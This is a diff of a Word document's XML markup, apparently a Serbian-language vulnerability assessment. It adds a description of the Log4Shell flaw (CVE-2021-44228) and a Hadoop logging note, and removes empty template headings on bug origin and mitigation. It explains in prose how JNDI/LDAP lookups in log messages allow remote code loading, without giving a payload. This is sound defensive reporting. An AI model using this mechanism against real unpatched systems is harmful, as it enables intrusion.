-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Uvođenje</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Greške</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Commit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Verzija</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Primer Koda (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ako</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> je </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>primenljivo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:bCs/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:pict w14:anchorId="49403FF6">
-          <v:rect id="_x0000_i1148" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Preporuke</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> za </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>mitigaciju</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Da li je </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>dostupan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Vendor Fix </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ili</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>patch  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Da/Ne): Da</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Mitigation Strategy:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Alternativni</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fix (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>ukoliko</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ne </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>postoji</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>vendorski</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
+        <w:t> via the Apache Commons Logging framework for logging. Edit the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hadoop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/log4j.properties file to customize the Hadoop daemons’ logging configuration (log-formats and so on).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://www.cvedetails.com/</w:t>
+          <w:t>https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/ClusterSetup.html</w:t>
         </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Enumeracija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CVE-a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CVE ID: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>CVE-2021-44228</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Plugin ID: 104739</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Opis</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Apache Log4j2 2.0-beta9 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">do </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2.15.0 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>isklučujući</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sigurnostna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>izdanja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.12.2, 2.12.3, and 2.3.1) JNDI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>funkcionalnosti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>koje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>koriste</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>konfiguraciji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, log </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>porukama</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>parametrima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ne </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>štite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> od LDAP I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>drugih</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> JNDI</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (java naming and directory interface)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>povezanih</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>endpointa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>koje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kontroliše</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>napadač</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Napadač</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> koji </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>može</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kontroliše</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> log </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>poruke</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>parametre</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> log </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>poruka</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>može</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vrši</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>proizvoljan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>učitan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>servera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kada</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> je message lookup substitution </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>omogućen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Od </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>verzije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>log4j 2.15.0</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ovo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ponašanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>podrazumevano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>onemogućeno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Od </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>verzije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2.16.0 (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zajedno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2.12.2, 2.12.3, and 2.3.1), </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ova </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>funkcionalnost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>skroz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uklonjena</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Ova </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ranjivost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>specifična</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> za</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> log4j-core </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">I ne </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>utiče</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> log4net, log4cxx, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ili</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>druge</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Apache Logging Services projects.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Koristeci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> JNDI </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP, URL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ldap://localhost:3xx/o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>moze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dobije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>udaljene</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>objekte</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>servera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> koji </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lokalnoj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>masini</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ILI </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>servera</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>koje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kontrolise</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>napadac</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Podrazumevani</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kljuc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>imati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
